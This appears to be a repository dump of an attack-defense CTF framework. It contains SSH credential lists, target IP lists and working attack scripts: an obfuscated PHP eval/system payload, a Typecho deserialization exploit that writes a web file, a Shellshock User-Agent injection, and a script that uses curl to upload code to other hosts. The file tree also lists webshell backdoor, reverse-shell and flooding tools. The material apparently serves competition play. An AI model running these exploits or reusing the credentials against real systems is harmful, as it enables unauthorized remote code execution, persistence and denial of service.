├── .gitignore ├── auto_ssh.py ├── autossh ├── friends.txt ├── gen.py ├── his ├── my.txt ├── now.txt ├── success.log ├── t_3 ├── targets └── test.txt ├── check.py ├── data ├── all_ip.data ├── gen.py ├── ip.data ├── ip.data.2 ├── ip.data.old ├── msg.data ├── p2p │ └── agent.php ├── ua.data └── weevely.key ├── framework ├── __init__.py ├── config.py ├── flag.py ├── function.py └── http.py ├── log └── sys.log ├── m.py ├── maintain ├── __init__.py └── function.py ├── my_web_trash.py ├── old_run.py ├── pwn ├── case2 ├── case2.c ├── pwn_2.py ├── pwn_pubg.py └── pwn_rand.py ├── readme ├── run.py ├── samples ├── __init__.py ├── call.py ├── call_2.py ├── eval.py ├── examples │ ├── call.py │ ├── eval.py │ ├── ln_read.py │ ├── read.py │ ├── upload.py │ └── weevely.py ├── ln_read.py ├── not_use │ ├── 1.php │ ├── 1.py │ ├── 2.py │ ├── 3.py │ ├── crontab.py │ ├── db_admin_attack.py │ ├── file_write.py │ ├── js_attack.py │ ├── js_exe.py │ ├── login.py │ ├── login_controller.go │ ├── new_replay.py │ ├── pwn_1.py │ ├── replay.py │ ├── ser.py │ └── tmp.php └── old │ ├── ali_assert.py │ ├── ass_read.py │ ├── ass_read2.py │ ├── bctf_exec.py │ ├── bctf_read.py │ ├── hctf_edit.py │ ├── hctf_image.py │ ├── hctf_inc.py │ ├── hctf_install.py │ ├── hctf_read.py │ ├── hwb_eval.py │ ├── hwb_read.py │ ├── hwb_up.py │ ├── hwb_up2.py │ ├── mysql.py │ ├── php_assert.py │ ├── php_input_include.py │ ├── php_system.py │ ├── php_weevely.py │ ├── qwb_block.py │ ├── qwb_block_2.py │ ├── qwb_block_3.py │ ├── qwb_datas.py │ ├── qwb_export.py │ ├── qwb_export_2.py │ ├── qwb_pwn_1.py │ ├── qwb_read.py │ ├── sample.py │ ├── sequence_attack_eval.py │ ├── shit_assert.py │ ├── shit_assert_2.py │ ├── shit_assert_3.py │ ├── shit_del.py │ ├── shit_read.py │ ├── shit_read2.py │ ├── shit_ser.py │ ├── shit_update.py │ ├── shit_upload.py │ ├── test_upload.py │ ├── tsctf_block.py │ ├── tsctf_read.py │ ├── tsctf_read2.py │ ├── tsctf_read3.py │ ├── tsctf_read4.py │ ├── tsctf_read6.py │ ├── wdb_assert.py │ ├── wdb_assert_2.py │ ├── wdb_assert_3.py │ ├── wdb_read.py │ ├── wdb_read2.py │ ├── wdb_read3.py │ ├── wdb_read4.py │ ├── wdb_up.py │ ├── yun_assert.py │ ├── yun_read2.py │ ├── yun_up2.py │ ├── yun_up3.py │ ├── yun_upload.py │ └── yunan_assert_1.py ├── script ├── .1.php ├── 1.php ├── README.md ├── docker.sh ├── http_dos.py ├── run.sh ├── server.py ├── sockstress ├── synflood ├── test.php ├── test.sh └── test2.sh ├── seq ├── __init__.py ├── attack.py ├── change_passeword │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ └── config.py ├── edit_page │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ └── config.py ├── example │ ├── 1.txt │ ├── __init__.py │ └── config.py ├── gen_py.py ├── image_upload │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ └── config.py ├── inc │ ├── 1.txt │ ├── 2.txt │ ├── __init__.py │ └── config.py ├── php_eval │ ├── 1.txt │ ├── __init__.py │ └── config.py ├── read_flag_qwb │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ └── config.py ├── shit_upload │ ├── 1.txt │ ├── 2.txt │ ├── __init__.py │ └── config.py ├── sql │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ ├── config.py │ └── test.php ├── template_replay.py ├── test │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── 4.txt │ ├── __init__.py │ ├── config.py │ ├── test.txt │ └── traffic.txt └── upload │ ├── 1.txt │ ├── 2.txt │ ├── __init__.py │ └── config.py ├── trash_traffic ├── clean.sh ├── confused http traffic for AWD.md ├── filter.py ├── http.py ├── logs │ ├── 127.0.0.1:81 │ │ ├── 0385717216c5e9bc989f42b6273f9720 │ │ ├── 05bbc16d8111d19543ff787677cdd78e │ │ ├── 08854e8fe55ba0ca82a36563c349ed80 │ │ ├── 09e66a9eb1f1535a391705bf77e80a32 │ │ ├── 09f0b8edd4e30189c5fe8558aa326788 │ │ ├── 0d5fc2bd1e173f734b1eed31ad813d33 │ │ ├── 10ced345ee68280fa1a7ce77c3279971 │ │ ├── 12042bdb3697ff30b672c9fee930f72a │ │ ├── 12fa62a65058f210eea8a76603457614 │ │ ├── 1366f57b12557b9325c25a275fed4e39 │ │ ├── 14ae2b08aecb49bf588ed019898a984e │ │ ├── 1566708b8297f750f7ee4e046fc1ab75 │ │ ├── 22dc502463205f40f7f5c236bfea32be │ │ ├── 23119d828c3d12b77a80ff3f8a198e54 │ │ ├── 32a04aa3fd0e050d364ffa69cf46fcaf │ │ ├── 355b08dbd868c54d902864ba1af537af │ │ ├── 3f3040d3e1851df8494a8347664424da │ │ ├── 406afdf837ed64606c003f664ff6ca0a │ │ ├── 4189ac8bf01ebe3f72832013d5bc23a2 │ │ ├── 42c46754edaa84a4d15766bb60e5a2c1 │ │ ├── 4a822e5f970a51b6d1f6f5ed4006c12d │ │ ├── 500071d296c34cc8a0b141047b111f6c │ │ ├── 50485ae16bace75f41366b3a30655a86 │ │ ├── 516162848c0a62e54d3ce9ded3e2026b │ │ ├── 52aada699f08652a2616b8df3feaf630 │ │ ├── 58cb2126f179f9a8a697ddeeb7ffb7aa │ │ ├── 5a662ea3a504ef206fdfac12c1bd2c5c │ │ ├── 5b9667273a0105dbd2db2a341f99ccc4 │ │ ├── 60e1a5be560235b745d9fd9907df6ba5 │ │ ├── 6a49106642b1aa1718f8474ff03612ea │ │ ├── 6b63153d63ac8a93f1c0deba57843891 │ │ ├── 6d105b09e66cfd76981e87f6be4a4fb6 │ │ ├── 740ee8f3c4727f410db70b45e1ab907e │ │ ├── 7476fb9090fde1efc8fa5327597e7954 │ │ ├── 7529f0051cc823b6f5169a5982080b80 │ │ ├── 7acdf0f96512b48b34c7251d3874d732 │ │ ├── 7bae936040765ecb08fc8b245f5d0215 │ │ ├── 80c007c9790f7393f760bbfdc5ded6ac │ │ ├── 8296563bd0061a8167ede1b37620f745 │ │ ├── 8578297d1c65fb4c6a383ab7a8215871 │ │ ├── 8cdda0b41c00bc6c70fd446236826d3f │ │ ├── 8cdfb3ef51d203323e959ada34133533 │ │ ├── 8e920d93b52110ab73567c6b542c0288 │ │ ├── 8f2c52177387ff26b562d75b0123d126 │ │ ├── 8fe6526b868357128f327e96f00a9317 │ │ ├── 94e05430dff3749b36c944dbdc2115e0 │ │ ├── 97dc0c478a9615e246b9ced2ea776a85 │ │ ├── 99ad37bc2268f156ef5965331b7eb3cf │ │ ├── 9d63dce7c4ca1a01d4883ad458752beb │ │ ├── 9d925962abb90e2372e005c11dd50c56 │ │ ├── 9d99e6335bda991c84012d17a7303c6f │ │ ├── ad140c4416a8f5ebb0dc1185c54d3542 │ │ ├── b4c39aa72a9f0a4f3ce3947ac130aaab │ │ ├── b5af33cf20bc27b2db223d09095decab │ │ ├── b60397ac7d1f4e4671ff7165986820d0 │ │ ├── bb776e377bc7d36d77e93fd7addb39ae │ │ ├── c126094582f53559774ce132f5610365 │ │ ├── c65d1a22181719fe1c1bd69f6441217e │ │ ├── c7430fe81b5eb303066cd85c3680e657 │ │ ├── cf279ed506ce6b90747389a233d6947b │ │ ├── d796132a3962b4adf36bef0efc171fe5 │ │ ├── dd857bb8e6b7e0475ded3e21327fcfa6 │ │ ├── dee3e14f7f7908fbdbd1e4a525e5280b │ │ ├── e1dc6aaa571539a516006f0a2d61e081 │ │ ├── e485b404e69dc2b9eee03a2a5750f575 │ │ ├── e5f5c5375278e1ba2bf39abf8e8cdc87 │ │ ├── e7a653ceec5addaf2f8e78698da6d295 │ │ ├── eab0411f1728196f1cc48665921e75cf │ │ ├── eabfc696c98c0843a70e46aea2eba60f │ │ ├── f0b01d66e4ce1473ce140e9a187657a3 │ │ ├── f4e70e5af5ec300379e5f1d9b3ff10bd │ │ ├── f7d98be8637791de8ea464b5944d7fa4 │ │ └── fde7b654f3f65d11403d005916ff5476 │ ├── 127.0.0.1:8889 │ │ ├── 046656fb8d2aad4a37955ce4adc692f8 │ │ ├── 096f53ef515da5c799183b6842e34e10 │ │ ├── 20d50bb39b6752e50e7407ea2c40df88 │ │ ├── 21aaf9b4ba8ebf8ac8e729cd5198b5a2 │ │ ├── 2aa437cb39bf02a37f89be158dc34310 │ │ ├── 754f79748331ccc566e899367fa586dc │ │ ├── 7c87f6168eb5ab1dad22f426261c716a │ │ ├── acc885b704b5316915aafff07d0be1a2 │ │ ├── b49519e42b1a1bb606f5f2f7876dacfe │ │ ├── c06eb1fb8a187f9f495b8afcbe4ab8a6 │ │ ├── c0ec7f723d52510b0cb6cc1904eff237 │ │ ├── d4e24a5cc6c072f4e2449ed3b12bc966 │ │ ├── d525a7610da34ff148d8d522838d1f3b │ │ ├── f50fcb24a06165085c343ee7666caa06 │ │ └── f962c893b4ecd1a3a695d6e4071841db │ ├── 192.168.2.127 │ │ ├── 09f040c64cf1905b60979559d73fb27b │ │ ├── 0a8c1759c642cd26e45083060c40ed8f │ │ ├── 0fb0bda9efcc44896c860c5cce69c4b3 │ │ ├── 10db3ccbb640765e1f6612eeb48897cc │ │ ├── 18d2f7b240b161331ad789d58fdb25e2 │ │ ├── 1b821344794430217feee99394fbefd5 │ │ ├── 1f938e64baa94af14bf32ae417874d83 │ │ ├── 239492021fad8478a7c79a0a6af233ff │ │ ├── 2c14de939cb962e2b87b55788da1c5d3 │ │ ├── 2caff59e103db95687cf593341f009e3 │ │ ├── 330a3b176313d11d7b968a84ceb8830c │ │ ├── 377d6788a228968d5c38649bb9eacc9d │ │ ├── 387ff72aeeee3a8fa1b9271aa6de1a61 │ │ ├── 3c3136b46f3aad02057b80b07d232315 │ │ ├── 40b8ac73d48cb23279853520e573fe7b │ │ ├── 41786e3fe033c73f7e689f67af086999 │ │ ├── 426f72c5f22d526019e1abb92b772f09 │ │ ├── 439d6c23d1ba92773a206b3763ccd562 │ │ ├── 45b61c6910187e00d3cbe13c85bf6eb4 │ │ ├── 46adda9d9909ed9ad5f563b957b2e348 │ │ ├── 497c3ece2668c6198a5549a5665a8419 │ │ ├── 4b8fff9b79f4d88a14243767ecc72c27 │ │ ├── 4c5c76eacbceb1f4dfaed1883b1d3492 │ │ ├── 534811fae5754bd23f6ab7ff1b461133 │ │ ├── 5370b0e121f417adcc0bfc90c4c4cf19 │ │ ├── 5bed99b9b898be410eb75bc15a56018a │ │ ├── 6cbcebfc9e1438a26c4ae7f2e2ea004f │ │ ├── 721f58418e7e2fd251098cdd099c5214 │ │ ├── 79282fd15495861c0025c8b022fb11d0 │ │ ├── 841d3a91619d14fe87647cba6d111bc1 │ │ ├── 89b4b7929394050f2def9c1ec8eb90b3 │ │ ├── 8b299f0252d8aae317f0d2ff87e1f194 │ │ ├── 92acfd7c4d5c7cd451f4cb048dd2b8d8 │ │ ├── a19aa5308f87eda1d7912c76dd583630 │ │ ├── a48f7d2043a855b312c1ca9bec593ffc │ │ ├── a781aa11179a04c0a59ced51355bbd18 │ │ ├── aed34a18978e122fb4492ef7dbf67f29 │ │ ├── b09a68b48347d60b797d6b4bdaf4af63 │ │ ├── ba2a8aaf466b9ca940618d15f5d1879c │ │ ├── f50e7cfd508640f765009b5d35e145d0 │ │ └── fd7fe64158a2f910175df55e48b904bb │ └── comp:8803 │ │ ├── 0d8b909f9fd38a30f6bf46d95d50bf7a │ │ ├── 2be92810d446e87f8fc1ea6b5b555fd1 │ │ ├── 37463841def4257ed810469a2ccb53cd │ │ ├── 4da6321c52c6d896fe34ce84a94bf3c4 │ │ ├── 4efd38f94b8217cc7b7bbe63ec27e1a5 │ │ ├── 67a04f7eca2632f8b63466a43fd5ac8a │ │ ├── 7fcca04b79935afce5a218efda7e18cb │ │ ├── 9822836e4f3689687587b17b2cb9a8b7 │ │ ├── c4ee94df3ec4fccbccceeb21ccf155e8 │ │ ├── dd0863f4da9e66fa2a57d9b51b896bc1 │ │ ├── ec573e02f29cf6281480ef055bfb0d7d │ │ ├── f4791addbeaf5e819c92f1431ca413d2 │ │ └── f6e0d8635113b710f5dc0e7f6e8217c8 ├── pwn_trash.py ├── run.sh └── test.txt ├── utils ├── __init__.py ├── color.py ├── log.py └── weevely3 │ ├── bd │ ├── __init__.py │ ├── agents │ │ ├── legacycookie_php.tpl │ │ ├── stegaref_php.tpl │ │ └── stegaref_php_debug.tpl │ └── obfuscators │ │ ├── cleartext1_php.tpl │ │ └── obfusc1_php.tpl │ ├── core │ ├── __init__.py │ ├── argparsers.py │ ├── channels │ │ ├── __init__.py │ │ ├── channel.py │ │ ├── legacycookie │ │ │ ├── __init__.py │ │ │ └── legacycookie.py │ │ ├── legacyreferrer │ │ │ ├── __init__.py │ │ │ └── legacyreferrer.py │ │ └── stegaref │ │ │ ├── __init__.py │ │ │ ├── formatters.py │ │ │ ├── languages.txt │ │ │ ├── referrers.tpl │ │ │ ├── stegaref.py │ │ │ └── useragents.tpl │ ├── config.py │ ├── generate.py │ ├── loggers.py │ ├── messages.py │ ├── module.py │ ├── modules.py │ ├── sessions.py │ ├── terminal.py │ ├── vectorlist.py │ ├── vectors.py │ └── weexceptions.py │ ├── modules │ ├── __init__.py │ ├── audit │ │ ├── __init__.py │ │ ├── _disablefunctionbypass │ │ │ └── cgi.sh │ │ ├── _linuxprivchecker │ │ │ └── linuxprivchecker.py │ │ ├── disablefunctionbypass.py │ │ ├── etcpasswd.py │ │ ├── filesystem.py │ │ ├── linuxprivchecker.py │ │ ├── phpconf.py │ │ └── suidsgid.py │ ├── backdoor │ │ ├── __init__.py │ │ ├── _reversetcp │ │ │ ├── __init__.py │ │ │ └── tcpserver.py │ │ ├── reversetcp.py │ │ └── tcp.py │ ├── bruteforce │ │ ├── __init__.py │ │ ├── _sql │ │ │ ├── mysql.tpl │ │ │ └── pgsql.tpl │ │ └── sql.py │ ├── file │ │ ├── __init__.py │ │ ├── _bzip2 │ │ │ ├── EasyBzip2.class.php │ │ │ └── php_bzip2.tpl │ │ ├── _find │ │ │ └── bfs_walker.tpl │ │ ├── _gzip │ │ │ ├── EasyGzip.class.php │ │ │ └── php_gzip.tpl │ │ ├── _tar │ │ │ ├── EasyTar.class.php │ │ │ └── php_tar.tpl │ │ ├── _zip │ │ │ ├── EasyZip.class.php │ │ │ └── php_zip.tpl │ │ ├── bzip2.py │ │ ├── cd.py │ │ ├── check.py │ │ ├── clearlog.py │ │ ├── cp.py │ │ ├── download.py │ │ ├── edit.py │ │ ├── enum.py │ │ ├── find.py │ │ ├── grep.py │ │ ├── gzip.py │ │ ├── ls.py │ │ ├── mount.py │ │ ├── read.py │ │ ├── rm.py │ │ ├── tar.py │ │ ├── touch.py │ │ ├── upload.py │ │ ├── upload2web.py │ │ ├── webdownload.py │ │ └── zip.py │ ├── net │ │ ├── __init__.py │ │ ├── _curl │ │ │ ├── php_context.tpl │ │ │ ├── php_curl.tpl │ │ │ └── php_httprequest1.tpl │ │ ├── _phpproxy │ │ │ └── poxy.php │ │ ├── _scan │ │ │ └── fsockopen.tpl │ │ ├── curl.py │ │ ├── ifconfig.py │ │ ├── mail.py │ │ ├── phpproxy.py │ │ ├── proxy.py │ │ └── scan.py │ ├── shell │ │ ├── __init__.py │ │ ├── php.py │ │ ├── sh.py │ │ └── su.py │ ├── sql │ │ ├── __init__.py │ │ ├── _dump │ │ │ └── mysqldump.tpl │ │ ├── console.py │ │ └── dump.py │ └── system │ │ ├── __init__.py │ │ ├── extensions.py │ │ └── info.py │ ├── requirements.txt │ ├── testsuite │ ├── __init__.py │ ├── base_fs.py │ ├── base_test.py │ ├── config.py.orig │ ├── test_channels.py │ ├── test_file_bzip2.py │ ├── test_file_cd.py │ ├── test_file_check.py │ ├── test_file_download.py │ ├── test_file_enum.py │ ├── test_file_find.py │ ├── test_file_grep.py │ ├── test_file_gzip.py │ ├── test_file_ls.py │ ├── test_file_read.py │ ├── test_file_tar.py │ ├── test_file_upload.py │ ├── test_file_upload2web.py │ ├── test_file_zip.py │ ├── test_generators.py │ ├── test_net_curl.py │ ├── test_net_proxy.py │ ├── test_shell_php.py │ ├── test_shell_sh.py │ ├── test_shell_su.py │ ├── test_sql_console.py │ ├── test_system_info.py │ └── test_terminal.py │ ├── utils │ ├── __init__.py │ ├── _http │ │ └── user-agents.txt │ ├── code.py │ ├── http.py │ ├── ipaddr.py │ ├── iputil.py │ ├── prettify.py │ └── strings.py │ └── weevely.py └── waf_check.py /.gitignore: -------------------------------------------------------------------------------- 1 | log/** 2 | *.py[cod] 3 | log/sys.log 4 | samples/*.pyc 5 | -------------------------------------------------------------------------------- /autossh/friends.txt: -------------------------------------------------------------------------------- 1 | ctf:humensec444:172.16.0.87:22 2 | ctf:humensec444:172.16.0.117:22 3 | ctf:humensec444:172.16.0.123:22 4 | ubuntu:humensec444:172.16.0.83:22 5 | ubuntu:humensec444:172.16.0.113:22 6 | ubuntu:humensec444:172.16.0.119:22 7 | -------------------------------------------------------------------------------- /autossh/gen.py: -------------------------------------------------------------------------------- 1 | x = '' 2 | for i in range(101,152): 3 | open('t_3','a').write('www-data:password:172.20.%d.101:22\n'%i) 4 | for i in range(101,152): 5 | open('t_3','a').write('www-data:password::172.20.%d.102:22\n'%i) 6 | -------------------------------------------------------------------------------- /autossh/his: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/autossh/his -------------------------------------------------------------------------------- /autossh/my.txt: -------------------------------------------------------------------------------- 1 | ctf:ctf:172.16.0.68:22 2 | ubuntu:openstack:172.17.0.64:22 3 | pwn4:pwn4:172.16.0.66:22 4 | -------------------------------------------------------------------------------- /autossh/now.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/autossh/now.txt -------------------------------------------------------------------------------- /autossh/success.log: -------------------------------------------------------------------------------- 1 | ctf:d967889fa3b1aa7ae29300f978f10949:192.168.37.101:22 2 | ctf:82f2757f7e3c8e2e0d7ffa3ac4fe917b:192.168.37.100:22 3 | ctf:94be7a6ec260a72f3be48242f0fca298:192.168.37.101:22 4 | ctf:3ccf950d0ada27bb9ae036ed4b3008f9:192.168.37.100:22 5 | ctf:cbaf88166589663190483c367ba8e930:192.168.37.101:22 6 | ctf:ab9ee16cf6b9604b4217cc966a0cc915:192.168.37.100:22 7 | ctf:cd333f8956231495b658a806dbdf9cc1:192.168.37.101:22 8 | ctf:960c22cebe7ec91e5da1e93e778e6fbc:192.168.37.100:22 9 | ctf:335f2526bbc9adff3e2a5aa1e139fbfd:192.168.37.101:22 10 | ctf:7d685ce43d5646e3aed5c9f8ff60ce79:192.168.37.100:22 11 | ctf:0ab627eb88dceb36227be06e8d87e7b5:192.168.37.101:22 12 | ctf:26e1550ee0ff6e229edbe0b825839607:192.168.37.100:22 13 | ctf:b2394ffb089e479cf649fa2af98b8e60:192.168.37.100:22 14 | ctf:6bec8dbe2392ac21e43e7ac6e4380749:192.168.37.100:22 15 | ctf:ad519eacf85e95a4f18c8e99a3d9a6a2:192.168.37.100:22 16 | ctf:25ceb3bc1c514655f700691ab4428ed0:192.168.37.100:22 17 | ctf:c24c006a5202c5df8088672d53fbd333:172.17.0.2:22 18 | ctf:18f121f98de29c1496ef9ef40cf76f5e:172.17.0.3:22 19 | ctf:0d2eba4097bca846418551d94c04e62a:172.17.0.2:22 20 | ctf:df6ba742ac774ea5fa9e419caa6cd97e:172.17.0.3:22 21 | -------------------------------------------------------------------------------- /autossh/targets: -------------------------------------------------------------------------------- 1 | ctf:ctf:mut-orff.org:22 2 | -------------------------------------------------------------------------------- /autossh/test.txt: -------------------------------------------------------------------------------- 1 | ctf:ctf:192.168.37.100:22 2 | ctf:ctf:192.168.37.101:22 3 | -------------------------------------------------------------------------------- /data/all_ip.data: -------------------------------------------------------------------------------- 1 | 192.168.1.117:80 2 | 192.168.1.118:80 3 | 192.168.1.119:80 4 | 192.168.1.120:80 5 | 192.168.1.121:80 6 | 192.168.1.122:80 7 | 192.168.1.123:80 8 | 192.168.1.124:80 9 | 192.168.1.125:80 10 | 192.168.1.126:80 11 | -------------------------------------------------------------------------------- /data/gen.py: -------------------------------------------------------------------------------- 1 | open('ip.data','w').write("") 2 | 3 | for i in range(1,21): 4 | open('ip.data','a').write("192.168.%d.12:20002\n"%i) 5 | 6 | 7 | -------------------------------------------------------------------------------- /data/ip.data: -------------------------------------------------------------------------------- 1 | 192.168.1.12:20002 2 | 192.168.2.12:20002 3 | 192.168.3.12:20002 4 | 192.168.4.12:20002 5 | 192.168.5.12:20002 6 | 192.168.6.12:20002 7 | 192.168.7.12:20002 8 | 192.168.8.12:20002 9 | 192.168.9.12:20002 10 | 192.168.10.12:20002 11 | 192.168.11.12:20002 12 | 192.168.12.12:20002 13 | 192.168.13.12:20002 14 | 192.168.15.12:20002 15 | 192.168.16.12:20002 16 | 192.168.17.12:20002 17 | 192.168.18.12:20002 18 | 192.168.19.12:20002 19 | 192.168.20.12:20002 20 | -------------------------------------------------------------------------------- /data/ip.data.2: -------------------------------------------------------------------------------- 1 | 192.168.1.12:20002 2 | 192.168.6.12:20002 3 | 192.168.8.12:20002 4 | 192.168.9.12:20002 5 | 192.168.10.12:20002 6 | 192.168.11.12:20002 7 | 192.168.13.12:20002 8 | 192.168.15.12:20002 9 | 192.168.16.12:20002 10 | 192.168.17.12:20002 11 | 192.168.18.12:20002 12 | 192.168.19.12:20002 13 | 192.168.20.12:20002 14 | -------------------------------------------------------------------------------- /data/ip.data.old: -------------------------------------------------------------------------------- 1 | 192.168.1.117:80 2 | 192.168.1.118:80 3 | 192.168.1.119:80 4 | 192.168.1.120:80 5 | 192.168.1.121:80 6 | 192.168.1.122:80 7 | 192.168.1.123:80 8 | 192.168.1.124:80 9 | 192.168.1.125:80 10 | 192.168.1.126:80 11 | -------------------------------------------------------------------------------- /data/msg.data: -------------------------------------------------------------------------------- 1 | GET*---craso---*/Less-1/*---craso---*id={crasolee_para} 2 | GET*---craso---*/Less-1/*---craso---*id={crasolee_para} 3 | POST*---craso---*/Less-13/*---craso---*passwd={crasolee_para}&uname=aaaaaa&submit=Submit 4 | POST*---craso---*/Less-13/*---craso---*passwd=6666666&uname={crasolee_para}&submit=Submit 5 | POST*---craso---*/Less-13/*---craso---*passwd=6666666&uname=aaaaaa&submit={crasolee_para} 6 | GET*---craso---*/Less-1/*---craso---*{crasolee_para0}={crasolee_para} -------------------------------------------------------------------------------- /data/weevely.key: -------------------------------------------------------------------------------- 1 | d951118f -------------------------------------------------------------------------------- /framework/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/framework/__init__.py -------------------------------------------------------------------------------- /log/sys.log: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /maintain/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/maintain/__init__.py -------------------------------------------------------------------------------- /maintain/function.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework import config -------------------------------------------------------------------------------- /pwn/case2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/pwn/case2 -------------------------------------------------------------------------------- /pwn/case2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char g_buf[4]; 7 | 8 | int main(int argc, char **argv, char**envp){ 9 | int off = atoi(argv[1]); 10 | srand(time(0) + off); 11 | g_buf[0] = rand() % 26 + 65; 12 | g_buf[1] = rand() % 26 + 65; 13 | g_buf[2] = rand() % 26 + 65; 14 | 15 | unsigned int a,b,c; 16 | unsigned int d,e; 17 | a = rand() % 3; 18 | b = rand() % 3; 19 | c = rand() % 3; 20 | 21 | d = rand() % 6; 22 | e = rand() % 6; 23 | 24 | printf("%x,%x,%x,%x,%x,%x,%x,%x", g_buf[0], g_buf[1], g_buf[2], a, b, c, d, e); 25 | return 0; 26 | } -------------------------------------------------------------------------------- /readme: -------------------------------------------------------------------------------- 1 | 2 | python run.py -m edit -c change_password 3 | 4 | python run.py -m edit -c create_p2p 5 | 6 | 7 | suggest cmd after u find a vulnerability: 8 | 9 | python run.py -m edit -c get_shell -r 10 | python run.py -m edit -c get_flag -r 11 | python run.py -m edit -c crontab_submit_flag -r -l 1 12 | python run.py -m edit -c create_p2p -r 13 | python run.py -m edit -c run_p2p -r -l 1 14 | python run.py -m edit -c create_p2p -r 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /samples/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/samples/__init__.py -------------------------------------------------------------------------------- /samples/eval.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'c=%s'% quote(payload) 25 | res = http("post",target,target_port,"/a.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/examples/eval.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = '222=%s'% quote(payload) 25 | res = http("post",target,target_port,"/1.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/not_use/1.php: -------------------------------------------------------------------------------- 1 | _version = $version; 12 | $this->_type = $type; 13 | $this->_charset = $charset; 14 | $this->_lang = $lang; 15 | } 16 | public function addItem(array $item) 17 | { 18 | $this->_items[] = $item; 19 | } 20 | } 21 | class Typecho_Request 22 | { 23 | private $_params = array('screenName'=>'fputs(fopen(\'./usr/uploads/.a.php\',\'w\'),\'\')'); 24 | private $_filter = array('assert'); 25 | //private $_filter = array('assert', array('Typecho_Response', 'redirect')); 26 | } 27 | $payload1 = new Typecho_Feed(5, 'ATOM 1.0'); 28 | $payload2 = new Typecho_Request(); 29 | $payload1->addItem(array('author' => $payload2)); 30 | $exp['adapter'] = $payload1; 31 | $exp['prefix'] = 'Rai4over'; 32 | echo base64_encode(serialize($exp)); 33 | -------------------------------------------------------------------------------- /samples/not_use/1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from http import http 4 | from config import * 5 | from function import * 6 | 7 | ''' 8 | this is the payload script for vuln shellshock 9 | 10 | ''' 11 | 12 | 13 | def attack(target,cmd,get_flag): 14 | is_vuln = 1 15 | flag = "hello world!" 16 | info = "success" 17 | reserve = 0 18 | 19 | 20 | if check_shell(target,""): 21 | res = execute_shell(target,cmd) 22 | else: 23 | dump_warning(target,"check_shell failed","function.py check_shell") 24 | ''' 25 | put your payload code here 26 | 27 | ''' 28 | header = {"User-Agent": "() { :; }; "+cmd} 29 | try: 30 | res = http("get",target,target_port,"/ez_web/cgi-bin/skin_api.cgi","",header) 31 | except Exception,e: 32 | print e 33 | if "500" not in res : 34 | dump_error(target,"not vulnerable","1.py bashshock") 35 | 36 | if get_flag: 37 | if check_flag(res): 38 | flag = res 39 | print "flag => " + res.replace(" ","").replace("\n","") 40 | else: 41 | dump_warning(target,"flag format error,you may need to rewrite the shell", "1.py attack") 42 | else: 43 | dump_success(target,"execution cmd","1.py") 44 | print res 45 | 46 | 47 | print "test for bashshock attacking......." 48 | return flag,is_vuln,info,reserve 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /samples/not_use/crontab.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | 3 | import os 4 | 5 | hosts = open('../data/ip.data').readlines() 6 | for host in hosts: 7 | host = host.strip() 8 | ip,port = host.split(':') 9 | if ip=='192.168.2.56': 10 | continue 11 | port = 8080 12 | print ip 13 | r = os.popen('curl %s:%s/api/upload/ -F "type=image" -F "savepath=/gotsctf2018/controllers" -F "image=@login_controller.go" 